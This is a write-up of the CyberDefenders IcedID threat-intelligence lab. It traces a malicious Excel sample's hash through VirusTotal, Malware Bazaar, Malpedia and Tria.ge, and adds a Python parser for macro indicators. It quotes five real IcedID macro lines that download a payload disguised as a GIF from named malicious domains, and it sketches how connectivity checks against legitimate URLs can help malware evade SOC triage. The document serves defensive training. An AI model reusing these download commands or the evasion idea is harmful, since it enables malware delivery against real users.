Investigate IcedID malware using VirusTotal and threat intelligence platforms to identify IOCs, associated threat actors, and execution mechanisms.
Introduction
The CyberDefenders IcedID challenge is another Easy challenge. This room is another threat intel focused room, so we’ll likely be using any.run, Recorded Future’s Tria.ge platform, and probably VirusTotal as well.
Here’s the introduction to the challenge:
A cyber threat group was identified for initiating widespread phishing campaigns to distribute further malicious payloads. The most frequently encountered payloads were IcedID. You have been given a hash of an IcedID sample to analyze and monitor the activities of this advanced persistent threat (APT) group.
Sounds neat! We won’t be playing with any malware samples today, but threat intel with just a hash to go off of can still be pretty fun.
Like in prior challenge rooms from CyberDefenders, we can download the lab files locally. All of the ‘Easy’ rooms so far have only contained a .txt file with a hash, and it’s no different here:
~/Downloads> unzip ./174-IcedID.zip
Archive: ./174-IcedID.zip
[./174-IcedID.zip] temp_extract_dir/hash.txt password:
inflating: temp_extract_dir/hash.txt
~/Downloads> cd temp_extract_dir/
~/D/temp_extract_dir> cat hash.txt
191eda0c539d284b29efe556abb05cd75a9077a0
Use this hash on online threat intel platforms (e.g., VirusTotal, Hybrid Analysis) to complete the lab analysis.
Question one
What is the name of the file associated with the given hash?
Like with all of these questions, there are no doubt many different ways to find the answer. One of the easiest ways to find a file name associated with a hash is by checking the VirusTotal Details page.
VirusTotal usually shows the most common name underneath the hash at the top of the page, which is a pretty good way to catch basic details. Oddly, the name shown here is d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx.bin, i.e. the hash with .xlsx.bin appended at the end.
This is not the answer. To find that we need to go to the Details page. Under the Names sub-heading you’ll see a few entries:
d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx.bin
d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx
sample_04.xlsx
717.xlsx
document-1982481273.xlsm
One of these is the answer. Check on the format of the answer to narrow it down.
Question two
Can you identify the filename of the GIF file that was deployed?
Head over to the Relations tab. The .gif file can be seen under Contacted URLs.
Looking a bit deeper, we can see that the same filename appears under the Dropped Files section. Note that it is not actually a .gif: in fact VirusTotal identifies it as a Win32 DLL, with 59 out of 71 vendors detecting it as malicious.
This is a pretty major red flag, but it’s also good confirmation that this is something that has previously been reported as malicious.
Question three
How many domains does the malware look to download the additional payload file in Q2?
Halfway there!
This question is worded slightly oddly, but the answer is easy to find on the same Relations page.
Under that same Contacted URLs section we can simply count how many times the malware attempts to contact the .gif file.
Question four
From the domains mentioned in Q3, a DNS registrar was predominantly used by the threat actor to host their harmful content, enabling the malware’s functionality. Can you specify the Registrar INC?
Checking the Contacted Domains section in the same report, we can see the registrars. It appears that the information here may be outdated, or more specifically that the question is. One registrar stands out as showing up more often: MarkMonitor Inc. You’ll find that this is not the correct answer, though.
The three domains registered through MarkMonitor Inc are all legitimate sites, and the question is looking for a registrar used by the threat actor for malicious domains. Malware may reach out to legitimate domains for a variety of reasons; sometimes contacting something common like Google or Reddit simply acts as a network connectivity check.
Let’s say you’re developing some malware (you hooligan, you). You want to exfiltrate data over the network (TA0010), but before you attempt to exfiltrate anything you decide to have your malware check whether the infected endpoint is even connected to the internet.
You could ping your C2 server and only continue if you receive an HTTP 200 code, but this could trigger an EDR alert for a connection to a new domain, or if your malware is already out in the wild you could find that your C2 has been reported (this would be bad for you anyway, but that’s beside the point for now). Instead you can send an innocuous request to something like a Microsoft URL. Depending on how your malware is packaged, you could even copy a domain that a legitimate Windows process uses to check for updates, or something of that ilk. Either way, as long as you receive an HTTP 200 back, you know that you’re online.
This might still trigger an alert, but if a SOC analyst looks at the process tree and runs the URL through VirusTotal, they’ll likely just assume it’s a benign action by some Windows process. I’ve seen something like this: a SOC analyst faced with a whole page of alerts sees the highlighted URLs, checks them in VirusTotal, sees a legitimate Microsoft URL, marks the alert as a false positive and moves on. This is especially bad if they go a step further and add the application to an allow-list.
It’s unlikely that all of this would happen, and when your malware finally gets around to exfiltrating data that would hopefully trigger more severe alerts, but it’s not impossible to imagine a scenario where a legitimate URL request results in malware being overlooked.
All that to say: legitimate URL strings being found doesn’t immediately mean that the program is also legitimate. It could be a network connectivity check, or the C2 infrastructure could be hosted on a legitimate cloud platform like AWS.
Going back to the question at hand, the answer is actually the registrar that only has one entry. It’s a very cheap way of getting a domain. I use the same one, in fact.
Question five
Could you specify the threat actor linked to the sample provided?
We’ll move over to Abuse.ch’s Malware Bazaar and search for the file hash for this question. We can observe some more information here, specifically other vendors’ threat intelligence reports. Clicking the ‘IcedID’ tag on Malware Bazaar links us to the Malpedia page.
The top of the Malpedia page shows the threat actor(s) who have been observed using the IcedID malware previously. We can thank all the threat researchers who have written reports for this attribution; it’s hard work and I can only imagine how long it takes.
All we need to do for this question is find the actor that lines up with the question. There are two shown, so you have a 50/50 chance of getting it on your first try!
Question six
In the Execution phase, what function does the malware employ to fetch extra payloads onto the system?
Final question!
We’ll go to the sandbox/hash search that is quickly becoming one of my favourites, Recorded Future’s Tria.ge. Here’s the link for the report on the hash. The Malware Config section is the one to focus on here. We can see a section of the macro contained in the .xlsx:
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://metaflip.io/ds/3003.gif", "..\ksjvoefv.skd")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://partsapp.com.br/ds/3003.gif", "..\ksjvoefv.skd1")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://columbia.aula-web.net/ds/3003.gif", "..\ksjvoefv.skd2")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://tajushariya.com/ds/3003.gif", "..\ksjvoefv.skd3")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://agenbolatermurah.com/ds/3003.gif", "..\ksjvoefv.skd4")
Every line above contains the answer, and we can see a few of the malicious endpoints too! The question is asking for the function; if you know how Excel macros work this should be easy to spot, and if not, check the length of the expected answer and you should find it quickly.
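To make the triage of Q3 (how many domains) and Q6 (which function) repeatable, here is a small parser for the Excel 4.0 macro cells shown above. It is an added example, not code from the challenge or from Tria.ge, and it assumes the macro cells have already been dumped to text exactly as the report displays them; the five cells are embedded as a constructed sample so it runs offline.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the five =CALL(...) cells from the Tria.ge report,
# reproduced as a raw string so the backslashes in the paths survive.
XLM_CELLS = r"""
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://metaflip.io/ds/3003.gif", "..\ksjvoefv.skd")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://partsapp.com.br/ds/3003.gif", "..\ksjvoefv.skd1")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://columbia.aula-web.net/ds/3003.gif", "..\ksjvoefv.skd2")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://tajushariya.com/ds/3003.gif", "..\ksjvoefv.skd3")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://agenbolatermurah.com/ds/3003.gif", "..\ksjvoefv.skd4")
"""

CALL_RE = re.compile(r'^=CALL\((.*)\)\s*$')       # whole =CALL(...) cell
ARG_RE = re.compile(r'"([^"]*)"|(-?\d+)')        # quoted string or bare number

def parse_call(cell):
    """Split one =CALL cell into (library, function, remaining args) or None."""
    m = CALL_RE.match(cell.strip())
    if not m:
        return None
    args = [quoted or number for quoted, number in ARG_RE.findall(m.group(1))]
    if len(args) < 3:
        return None
    # args[2] is the XLM argument-type string ("JCCB"); the call's own
    # arguments start at index 3.
    return args[0], args[1], args[3:]

def extract_downloads(cells):
    """Return one record per URLMon download call: function, URL, host, dest."""
    found = []
    for line in cells.splitlines():
        parsed = parse_call(line)
        if not parsed:
            continue
        lib, func, rest = parsed
        if lib.lower() != "urlmon" or not func.lower().startswith("urldownloadtofile"):
            continue
        for url in (a for a in rest if a.startswith(("http://", "https://"))):
            found.append({"function": func, "url": url,
                          "host": urlparse(url).hostname, "dest": rest[-1]})
    return found

def summarize(cells):
    """Answer-style summary: distinct download domains and the API used."""
    records = extract_downloads(cells)
    hosts = {r["host"] for r in records}
    return {"functions": sorted({r["function"] for r in records}),
            "domains": sorted(hosts), "domain_count": len(hosts),
            "payload_names": sorted({r["url"].rsplit("/", 1)[-1] for r in records})}
```

Running summarize(XLM_CELLS) reports five distinct domains all serving the same 3003.gif name, and URLDownloadToFileA as the only download API, which is exactly the pair of facts the two questions ask for.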
Conclusion
Another fun little ThreatIntel room from CyberDefenders. I definitely recommend giving it a try!